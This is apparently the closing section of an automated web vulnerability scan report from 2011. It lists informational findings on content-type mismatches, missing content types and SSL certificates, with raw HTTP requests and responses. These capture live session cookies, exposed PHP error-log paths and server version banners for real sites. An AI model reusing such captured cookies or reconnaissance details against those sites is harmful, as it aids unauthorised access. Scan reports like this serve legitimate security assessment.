Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:26 GMT
Content-Length: 22

Invalid Application ID

31.88. http://www.kminek.pl/bsdlicense.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kminek.pl
Path:   /bsdlicense.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /bsdlicense.txt HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:34 GMT
Server: Apache
Last-Modified: Tue, 26 May 2009 17:29:02 GMT
ETag: "1614a5b-5e7-46ad41010f380"
Accept-Ranges: bytes
Content-Length: 1511
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

Copyright (c) kminek.pl & Grzegorz W..jcik

All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions
...[SNIP]...

31.89. http://www.sustainabilitycoalition.org/wp-content/plugins/forum-server/fs-admin/error_log  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sustainabilitycoalition.org
Path:   /wp-content/plugins/forum-server/fs-admin/error_log

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wp-content/plugins/forum-server/fs-admin/error_log HTTP/1.1
Host: www.sustainabilitycoalition.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:17:08 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 09:35:41 GMT
ETag: "41ed308-3f89-49b719b013540"
Accept-Ranges: bytes
Content-Length: 16265
Content-Type: text/plain

[09-Apr-2010 04:29:03] PHP Fatal error: Call to a member function show_errors() on a non-object in /home1/sustaio9/public_html/wp-content/plugins/forum-server/fs-admin/fs-admin.php on line 16
[09-Apr
...[SNIP]...

31.90. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thesfmarathon.com
Path:   /wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php HTTP/1.1
Host: www.thesfmarathon.com
Proxy-Connection: keep-alive
Referer: http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:17:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Content-Length: 212
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function get_usergroup_name() on a non-object in <b>/home/tsfm/public_html/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php</b> on line <b>2
...[SNIP]...

31.91. http://www.thumbshots.com/portals/0/Flash/BannerRotator/images.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thumbshots.com
Path:   /portals/0/Flash/BannerRotator/images.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /portals/0/Flash/BannerRotator/images.xml HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/portals/0/Flash/BannerRotator/banner.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 31 Oct 2010 18:53:04 GMT
Accept-Ranges: bytes
ETag: "828a71d92c79cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:34 GMT
Content-Length: 2676


<!--
This is the full list of specific particularities which you can set for each image. Next to each property is the corresponding overall setting of the Banner.
When you specify one of these pro
...[SNIP]...

31.92. http://www.w3.org/2006/04/ttaf1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /2006/04/ttaf1

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /2006/04/ttaf1 HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:46 GMT
Server: Apache/2
Last-Modified: Thu, 27 Apr 2006 16:30:34 GMT
ETag: "2b5-4126c1b803e80"
Accept-Ranges: bytes
Content-Length: 693
Cache-Control: max-age=21600
Expires: Fri, 04 Feb 2011 02:30:46 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

This is a placeholder for a namespace document that permits
dereferencing the Timed Text (TT) Authoring Format V1.0
Distribution Format Exchange Profile namespace URIs:


http://www.w3.org/2006/04/tta
...[SNIP]...

31.93. http://www.w3.org/TR/html4/loose.dtd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/html4/loose.dtd

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /TR/html4/loose.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:10 GMT
Server: Apache/2
Content-Location: loose.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "b17a-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 45434
Cache-Control: max-age=7776000
Expires: Wed, 04 May 2011 20:31:10 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is the HTML 4.01 Transitional DTD, which includes
presentation attributes and elements that W3C expects to phase out
as support for style sheets matures. Authors should use the S
...[SNIP]...

32. Content type is not specified  previous  next
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


32.1. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 21:59:55 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_4ffd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1g6v=h0l%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: T_kjvx=h0h%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dly2=3-lg2afw-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Content-Length: 12998

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

32.2. http://load.tubemogul.com/core  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /core

Request

GET /core HTTP/1.1
Host: load.tubemogul.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _tmcm="Z29vZ2xlOjIwMTEwMjE4fHRhcmd1czoyMDExMDIxOA=="; _ds="c2VnbWVudD0wMDAmemlwPSZhZ2U9JmdlbmRlcj0="; _tmid=tm45Qav-oCnshURml8o0;

Response

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 19:47:58 GMT
Connection: close
Content-Length: 14

Not Authorized

32.3. http://store.apple.com/us/cartx/save  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/cartx/save

Request

GET /us/cartx/save?_a=sa&_fid=saveForLater&product=H1938ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:10:12 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 18:10:12 GMT
Vary: *
Date: Thu, 03 Feb 2011 18:10:12 GMT
x-request-id: fc022f31-0106-49de-813d-421d6474df18
Content-Length: 197
pragma: no-cache
x-frame-options: sameorigin

{"body":{},"head":{"status":"302","data":{"url":"https://store.apple.com/us/sign_in?c=ee0b56109079d1b2dc478f425e641f53&r=SCDHYHP7CY4H9XK2H&s=8b1248fa12bae7ad0a411c199aded00e&t=S99KKATD9FP9FHCP4"}}}

33. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



33.1. https://store.apple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  store.apple.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jun 23 19:00:00 CDT 2010
Valid to:  Sat Jun 23 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

33.2. https://www.supermedia.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.supermedia.com
Issued by:  Trusted Secure Certificate Authority
Valid from:  Thu Mar 04 18:00:00 CST 2010
Valid to:  Sat Mar 05 17:59:59 CST 2011

Certificate chain #1

Issued to:  Trusted Secure Certificate Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Jun 28 13:14:35 CDT 2007
Valid to:  Sun Oct 28 13:44:35 CDT 2012

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:27:43 CST 2011.